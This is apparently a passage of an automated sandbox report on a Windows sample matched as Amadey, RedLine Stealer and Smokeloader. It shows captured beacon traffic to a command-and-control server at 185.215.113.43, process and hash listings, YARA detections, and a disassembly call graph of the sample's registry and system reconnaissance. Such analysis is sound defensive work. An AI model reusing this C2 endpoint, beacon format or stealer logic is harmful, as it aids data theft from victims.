                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 10:36:37.105528116 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:36:36 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  90192.168.2.664783185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:36:38.616646051 CEST314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
                  Sep 25, 2024 10:36:39.319875956 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:36:39 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Click to jump to process

                  Click to jump to process

                  Click to dive into process behavior distribution

                  Click to jump to process

                  Target ID:0
                  Start time:04:32:32
                  Start date:25/09/2024
                  Path:C:\Users\user\Desktop\yjzllYsjlU.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\yjzllYsjlU.exe"
                  Imagebase:0x400000
                  File size:429'568 bytes
                  MD5 hash:05B4B94FE502B06454E6FE20B6965C76
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2353337149.000000000052C000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.2213576704.00000000021F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                  Reputation:low
                  Has exited:true

                  Target ID:4
                  Start time:04:32:33
                  Start date:25/09/2024
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6716 -s 720
                  Imagebase:0x930000
                  File size:483'680 bytes
                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:6
                  Start time:04:32:34
                  Start date:25/09/2024
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6716 -s 788
                  Imagebase:0x930000
                  File size:483'680 bytes
                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:8
                  Start time:04:32:35
                  Start date:25/09/2024
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6716 -s 852
                  Imagebase:0x930000
                  File size:483'680 bytes
                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:10
                  Start time:04:32:36
                  Start date:25/09/2024
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6716 -s 896
                  Imagebase:0x930000
                  File size:483'680 bytes
                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:12
                  Start time:04:32:37
                  Start date:25/09/2024
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6716 -s 920
                  Imagebase:0x930000
                  File size:483'680 bytes
                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:14
                  Start time:04:32:38
                  Start date:25/09/2024
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6716 -s 852
                  Imagebase:0x930000
                  File size:483'680 bytes
                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:16
                  Start time:04:32:39
                  Start date:25/09/2024
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6716 -s 1044
                  Imagebase:0x930000
                  File size:483'680 bytes
                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:18
                  Start time:04:32:39
                  Start date:25/09/2024
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6716 -s 1120
                  Imagebase:0x930000
                  File size:483'680 bytes
                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:20
                  Start time:04:32:41
                  Start date:25/09/2024
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6716 -s 1176
                  Imagebase:0x930000
                  File size:483'680 bytes
                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:21
                  Start time:04:32:42
                  Start date:25/09/2024
                  Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                  Imagebase:0x400000
                  File size:429'568 bytes
                  MD5 hash:05B4B94FE502B06454E6FE20B6965C76
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000015.00000002.2334468394.00000000006ED000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000015.00000002.2334219685.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000015.00000002.2334568355.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000015.00000003.2309432700.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  Antivirus matches:
                  • Detection: 39%, ReversingLabs
                  Reputation:low
                  Has exited:true

                  Target ID:23
                  Start time:04:32:42
                  Start date:25/09/2024
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6716 -s 1400
                  Imagebase:0x930000
                  File size:483'680 bytes
                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:25
                  Start time:04:32:43
                  Start date:25/09/2024
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6008 -s 468
                  Imagebase:0x930000
                  File size:483'680 bytes
                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:28
                  Start time:04:33:00
                  Start date:25/09/2024
                  Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  Imagebase:0x400000
                  File size:429'568 bytes
                  MD5 hash:05B4B94FE502B06454E6FE20B6965C76
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000001C.00000002.4668968733.00000000006D0000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001C.00000002.4668844085.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000001C.00000002.4668844085.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001C.00000003.2486405419.0000000002160000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001C.00000002.4668594111.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
                  Has exited:false

                  Target ID:31
                  Start time:04:33:00
                  Start date:25/09/2024
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1488 -s 536
                  Imagebase:0x930000
                  File size:483'680 bytes
                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  Target ID:33
                  Start time:04:33:02
                  Start date:25/09/2024
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1488 -s 732
                  Imagebase:0x930000
                  File size:483'680 bytes
                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  Target ID:35
                  Start time:04:33:03
                  Start date:25/09/2024
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1488 -s 740
                  Imagebase:0x930000
                  File size:483'680 bytes
                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  Target ID:38
                  Start time:04:33:04
                  Start date:25/09/2024
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1488 -s 756
                  Imagebase:0x930000
                  File size:483'680 bytes
                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  Reset < >

                    Execution Graph

                    Execution Coverage:1.5%
                    Dynamic/Decrypted Code Coverage:5.2%
                    Signature Coverage:27.3%
                    Total number of Nodes:655
                    Total number of Limit Nodes:24
                    execution_graph 58404 43ac53 58409 43aa29 58404->58409 58408 43ac92 58410 43aa48 58409->58410 58411 43aa5b 58410->58411 58419 43aa70 58410->58419 58429 4375f6 14 API calls __dosmaperr 58411->58429 58413 43aa60 58430 436c5a 25 API calls __wsopen_s 58413->58430 58415 43aa6b 58415->58408 58426 441a9c 58415->58426 58417 43ac41 58435 436c5a 25 API calls __wsopen_s 58417->58435 58419->58419 58424 43ab90 58419->58424 58431 44132b 37 API calls 2 library calls 58419->58431 58421 43abe0 58421->58424 58432 44132b 37 API calls 2 library calls 58421->58432 58423 43abfe 58423->58424 58433 44132b 37 API calls 2 library calls 58423->58433 58424->58415 58434 4375f6 14 API calls __dosmaperr 58424->58434 58436 441461 58426->58436 58429->58413 58430->58415 58431->58421 58432->58423 58433->58424 58434->58417 58435->58415 58438 44146d __FrameHandler3::FrameUnwindToState 58436->58438 58437 441474 58456 4375f6 14 API calls __dosmaperr 58437->58456 58438->58437 58441 44149f 58438->58441 58440 441479 58457 436c5a 25 API calls __wsopen_s 58440->58457 58447 441a2e 58441->58447 58445 441483 58445->58408 58459 43698d 58447->58459 58452 441a64 58454 4414c3 58452->58454 58514 43adf5 14 API calls _free 58452->58514 58458 4414f6 RtlLeaveCriticalSection __wsopen_s 58454->58458 58456->58440 58457->58445 58458->58445 58515 43690a 58459->58515 58462 4369b1 58464 4368ed 58462->58464 58527 43683b 58464->58527 58467 441abc 58552 44180a 58467->58552 58470 441b07 58570 43bf3a 58470->58570 58471 441aee 58584 4375e3 14 API calls __dosmaperr 58471->58584 58475 441af3 58585 4375f6 14 API calls __dosmaperr 58475->58585 58476 441b15 58586 4375e3 14 API calls __dosmaperr 58476->58586 58477 441b2c 58583 441775 CreateFileW 58477->58583 58481 441b1a 58587 4375f6 14 API calls __dosmaperr 58481->58587 58483 441be2 GetFileType 58484 441c34 58483->58484 58485 441bed GetLastError 58483->58485 58592 43be85 15 API calls 3 library calls 58484->58592 58590 4375c0 14 API calls 2 library calls 58485->58590 58486 441bb7 GetLastError 58589 4375c0 14 API calls 2 library calls 58486->58589 58487 441b65 58487->58483 58487->58486 58588 441775 CreateFileW 58487->58588 58491 441bfb CloseHandle 58491->58475 58494 441c24 58491->58494 58493 441baa 58493->58483 58493->58486 58591 4375f6 14 API calls __dosmaperr 58494->58591 58495 441c55 58497 441ca1 58495->58497 58593 441984 71 API calls 3 library calls 58495->58593 58502 441ca8 58497->58502 58595 441522 71 API calls 2 library calls 58497->58595 58498 441c29 58498->58475 58501 441cd6 58501->58502 58503 441ce4 58501->58503 58594 43af48 28 API calls 2 library calls 58502->58594 58504 441b00 58503->58504 58506 441d60 CloseHandle 58503->58506 58504->58452 58596 441775 CreateFileW 58506->58596 58508 441d8b 58509 441d95 GetLastError 58508->58509 58513 441caf 58508->58513 58597 4375c0 14 API calls 2 library calls 58509->58597 58511 441da1 58598 43c04d 15 API calls 3 library calls 58511->58598 58513->58504 58514->58454 58516 436921 58515->58516 58517 43692a 58515->58517 58516->58462 58523 43b307 5 API calls __wsopen_s 58516->58523 58517->58516 58524 43a671 37 API calls 3 library calls 58517->58524 58519 43694a 58525 43b5fb 37 API calls __cftof 58519->58525 58521 436960 58526 43b628 37 API calls __cftof 58521->58526 58523->58462 58524->58519 58525->58521 58526->58516 58528 436863 58527->58528 58529 436849 58527->58529 58531 43686a 58528->58531 58532 436889 58528->58532 58545 4369cc 14 API calls _free 58529->58545 58544 436853 58531->58544 58546 4369e6 15 API calls __wsopen_s 58531->58546 58547 43b099 MultiByteToWideChar 58532->58547 58534 436898 58536 43689f GetLastError 58534->58536 58538 4368c5 58534->58538 58550 4369e6 15 API calls __wsopen_s 58534->58550 58548 4375c0 14 API calls 2 library calls 58536->58548 58538->58544 58551 43b099 MultiByteToWideChar 58538->58551 58539 4368ab 58549 4375f6 14 API calls __dosmaperr 58539->58549 58542 4368dc 58542->58536 58542->58544 58544->58452 58544->58467 58545->58544 58546->58544 58547->58534 58548->58539 58549->58544 58550->58538 58551->58542 58553 441845 58552->58553 58554 44182b 58552->58554 58599 44179a 58553->58599 58554->58553 58606 4375f6 14 API calls __dosmaperr 58554->58606 58557 44183a 58607 436c5a 25 API calls __wsopen_s 58557->58607 58559 44187d 58560 4418ac 58559->58560 58608 4375f6 14 API calls __dosmaperr 58559->58608 58565 4418ff 58560->58565 58610 439b60 25 API calls 2 library calls 58560->58610 58563 4418fa 58563->58565 58566 441977 58563->58566 58564 4418a1 58609 436c5a 25 API calls __wsopen_s 58564->58609 58565->58470 58565->58471 58611 436c87 11 API calls __CreateFrameInfo 58566->58611 58569 441983 58571 43bf46 __FrameHandler3::FrameUnwindToState 58570->58571 58614 438dc8 RtlEnterCriticalSection 58571->58614 58573 43bf4d 58574 43bf94 58573->58574 58575 43bf72 58573->58575 58580 43bfe1 RtlEnterCriticalSection 58573->58580 58615 43c044 58574->58615 58618 43bd14 15 API calls 3 library calls 58575->58618 58579 43bf77 58579->58574 58619 43be62 RtlEnterCriticalSection 58579->58619 58580->58574 58581 43bfee RtlLeaveCriticalSection 58580->58581 58581->58573 58583->58487 58584->58475 58585->58504 58586->58481 58587->58475 58588->58493 58589->58475 58590->58491 58591->58498 58592->58495 58593->58497 58594->58513 58595->58501 58596->58508 58597->58511 58598->58513 58601 4417b2 58599->58601 58600 4417cd 58600->58559 58601->58600 58612 4375f6 14 API calls __dosmaperr 58601->58612 58603 4417f1 58613 436c5a 25 API calls __wsopen_s 58603->58613 58605 4417fc 58605->58559 58606->58557 58607->58553 58608->58564 58609->58560 58610->58563 58611->58569 58612->58603 58613->58605 58614->58573 58620 438e10 RtlLeaveCriticalSection 58615->58620 58617 43bfb4 58617->58476 58617->58477 58618->58579 58619->58574 58620->58617 58621 40c8e0 58622 40c937 58621->58622 58623 40c91f 58621->58623 58622->58623 58635 418de0 26 API calls 5 library calls 58622->58635 58625 40c95b 58623->58625 58626 40c988 SHFileOperation 58623->58626 58636 418de0 26 API calls 5 library calls 58623->58636 58625->58626 58629 40c9de shared_ptr 58626->58629 58628 40ca3e shared_ptr 58637 41cff1 58628->58637 58629->58628 58630 40ca64 58629->58630 58644 436c6a 58630->58644 58632 40ca60 58635->58623 58636->58626 58638 41cffa 58637->58638 58639 41cffc IsProcessorFeaturePresent 58637->58639 58638->58632 58641 41d223 58639->58641 58649 41d1e7 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 58641->58649 58643 41d306 58643->58632 58650 436bf6 25 API calls 2 library calls 58644->58650 58646 436c79 58651 436c87 11 API calls __CreateFrameInfo 58646->58651 58648 436c86 58649->58643 58650->58646 58651->58648 58652 408780 58653 408786 58652->58653 58659 436729 58653->58659 58656 4087a6 58658 4087a0 58675 436672 58659->58675 58662 4367b7 58663 4367c3 __FrameHandler3::FrameUnwindToState 58662->58663 58664 4367e2 58663->58664 58665 4367cd 58663->58665 58667 4367dd 58664->58667 58731 438d5f RtlEnterCriticalSection 58664->58731 58729 4375f6 14 API calls __dosmaperr 58665->58729 58667->58658 58669 4367d2 58730 436c5a 25 API calls __wsopen_s 58669->58730 58670 4367ff 58732 436740 65 API calls 3 library calls 58670->58732 58673 43680a 58733 436831 RtlLeaveCriticalSection ___scrt_uninitialize_crt 58673->58733 58678 43667e __FrameHandler3::FrameUnwindToState 58675->58678 58676 436685 58700 4375f6 14 API calls __dosmaperr 58676->58700 58678->58676 58680 4366a5 58678->58680 58679 43668a 58701 436c5a 25 API calls __wsopen_s 58679->58701 58682 4366b7 58680->58682 58683 4366aa 58680->58683 58692 43a8c3 58682->58692 58702 4375f6 14 API calls __dosmaperr 58683->58702 58687 4366c7 58703 4375f6 14 API calls __dosmaperr 58687->58703 58689 4366d4 58704 436712 RtlLeaveCriticalSection ___scrt_uninitialize_crt 58689->58704 58691 408793 58691->58656 58691->58662 58693 43a8cf __FrameHandler3::FrameUnwindToState 58692->58693 58705 438dc8 RtlEnterCriticalSection 58693->58705 58695 43a8dd 58706 43a967 58695->58706 58700->58679 58701->58691 58702->58691 58703->58691 58704->58691 58705->58695 58715 43a98a 58706->58715 58707 43a8ea 58719 43a923 58707->58719 58708 43a9e2 58724 43d82f 14 API calls 3 library calls 58708->58724 58711 43a9eb 58725 43adf5 14 API calls _free 58711->58725 58713 43a9f4 58713->58707 58726 43b4c1 6 API calls _unexpected 58713->58726 58715->58707 58715->58708 58722 438d5f RtlEnterCriticalSection 58715->58722 58723 438d73 RtlLeaveCriticalSection 58715->58723 58716 43aa13 58727 438d5f RtlEnterCriticalSection 58716->58727 58728 438e10 RtlLeaveCriticalSection 58719->58728 58721 4366c0 58721->58687 58721->58689 58722->58715 58723->58715 58724->58711 58725->58713 58726->58716 58727->58707 58728->58721 58729->58669 58730->58667 58731->58670 58732->58673 58733->58667 58734 407d30 58827 4340f0 58734->58827 58737 407db8 58829 417a00 58737->58829 58738 41cff1 do_wait 5 API calls 58740 40836d 58738->58740 58741 407dc7 58845 405c10 58741->58845 58743 407dd2 58744 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 58743->58744 58745 407df4 58744->58745 58746 405c10 51 API calls 58745->58746 58747 407dff GetModuleHandleA GetProcAddress 58746->58747 58749 407e25 shared_ptr 58747->58749 58750 407ea6 shared_ptr 58749->58750 58753 408374 58749->58753 58751 407ed3 GetNativeSystemInfo 58750->58751 58752 407ed7 GetSystemInfo 58750->58752 58754 407edd 58751->58754 58752->58754 58755 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 58753->58755 58759 408019 58754->58759 58760 407f3f 58754->58760 58784 407ee8 shared_ptr 58754->58784 58756 408379 58755->58756 58757 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 58756->58757 58758 40837e 58757->58758 58762 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 58759->58762 58761 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 58760->58761 58763 407f60 58761->58763 58764 408045 58762->58764 58765 405c10 51 API calls 58763->58765 58766 405c10 51 API calls 58764->58766 58767 407f67 58765->58767 58768 40804c 58766->58768 58769 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 58767->58769 58770 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 58768->58770 58771 407f7f 58769->58771 58772 408064 58770->58772 58773 405c10 51 API calls 58771->58773 58774 405c10 51 API calls 58772->58774 58777 407f86 58773->58777 58775 40806b 58774->58775 58776 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 58775->58776 58778 40809c 58776->58778 58897 438bbe 40 API calls 58777->58897 58780 405c10 51 API calls 58778->58780 58782 4080a3 58780->58782 58781 407fb1 58781->58756 58781->58784 58898 405730 26 API calls 3 library calls 58782->58898 58784->58738 58785 4080b2 58786 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 58785->58786 58787 4080ed 58786->58787 58788 405c10 51 API calls 58787->58788 58789 4080f4 58788->58789 58790 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 58789->58790 58791 40810c 58790->58791 58792 405c10 51 API calls 58791->58792 58793 408113 58792->58793 58794 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 58793->58794 58795 408144 58794->58795 58796 405c10 51 API calls 58795->58796 58797 40814b 58796->58797 58899 405730 26 API calls 3 library calls 58797->58899 58799 40815a 58800 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 58799->58800 58801 408195 58800->58801 58802 405c10 51 API calls 58801->58802 58803 40819c 58802->58803 58804 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 58803->58804 58805 4081b4 58804->58805 58806 405c10 51 API calls 58805->58806 58807 4081bb 58806->58807 58808 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 58807->58808 58809 4081ec 58808->58809 58810 405c10 51 API calls 58809->58810 58811 4081f3 58810->58811 58900 405730 26 API calls 3 library calls 58811->58900 58813 408202 58814 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 58813->58814 58815 40823d 58814->58815 58816 405c10 51 API calls 58815->58816 58817 408244 58816->58817 58818 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 58817->58818 58819 40825c 58818->58819 58820 405c10 51 API calls 58819->58820 58821 408263 58820->58821 58822 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 58821->58822 58823 408294 58822->58823 58824 405c10 51 API calls 58823->58824 58825 40829b 58824->58825 58901 405730 26 API calls 3 library calls 58825->58901 58828 407d96 GetVersionExW 58827->58828 58828->58737 58828->58784 58830 417a26 58829->58830 58831 417a2d 58830->58831 58832 417a81 58830->58832 58833 417a62 58830->58833 58831->58741 58840 417a76 std::_Rethrow_future_exception 58832->58840 58903 402480 26 API calls 5 library calls 58832->58903 58834 417ab9 58833->58834 58835 417a69 58833->58835 58904 402480 26 API calls 3 library calls 58834->58904 58902 402480 26 API calls 5 library calls 58835->58902 58839 417a6f 58839->58840 58841 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 58839->58841 58840->58741 58842 417ac3 58841->58842 58844 417af1 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ Concurrency::details::_TaskCollection::~_TaskCollection 58842->58844 58905 41ba06 RtlEnterCriticalSection RtlLeaveCriticalSection Concurrency::details::_CancellationTokenState::_RegisterCallback 58842->58905 58844->58741 58906 405940 58845->58906 58847 405c54 58909 404b30 58847->58909 58850 41cff1 do_wait 5 API calls 58853 405d39 58850->58853 58851 405d17 shared_ptr 58851->58850 58852 405d42 58854 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 58852->58854 58853->58743 58855 405d47 ListArray 58854->58855 58856 405da7 RegOpenKeyExA 58855->58856 58857 405e00 RegCloseKey 58856->58857 58858 405e26 58857->58858 58858->58858 58916 4180c0 58858->58916 58860 405ea6 shared_ptr 58862 41cff1 do_wait 5 API calls 58860->58862 58861 405e3e 58861->58860 58863 405ecd 58861->58863 58864 405ec9 58862->58864 58865 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 58863->58865 58864->58743 58866 405ed2 RegOpenKeyExA 58865->58866 58868 405f47 RegCloseKey 58866->58868 58870 405f84 58868->58870 58869 405ffe shared_ptr 58871 41cff1 do_wait 5 API calls 58869->58871 58870->58869 58872 406016 58870->58872 58873 406012 58871->58873 58874 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 58872->58874 58873->58743 58875 40601b __wsopen_s 58874->58875 58876 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 26 API calls 58875->58876 58877 406089 58876->58877 58878 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 26 API calls 58877->58878 58879 4060bd 58878->58879 58880 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 26 API calls 58879->58880 58881 4060ee 58880->58881 58882 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 26 API calls 58881->58882 58883 40611f 58882->58883 58884 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 26 API calls 58883->58884 58885 406150 RegOpenKeyExA 58884->58885 58888 4064b1 58885->58888 58886 4065b1 shared_ptr 58887 41cff1 do_wait 5 API calls 58886->58887 58890 4065d3 58887->58890 58888->58886 58889 4065d7 58888->58889 58891 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 58889->58891 58890->58743 58892 4065dc GetUserNameA LookupAccountNameA GetSidIdentifierAuthority 58891->58892 58894 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 58892->58894 58895 4066a6 58894->58895 58896 405c10 43 API calls 58895->58896 58897->58781 58898->58785 58899->58799 58900->58813 58901->58784 58902->58839 58903->58840 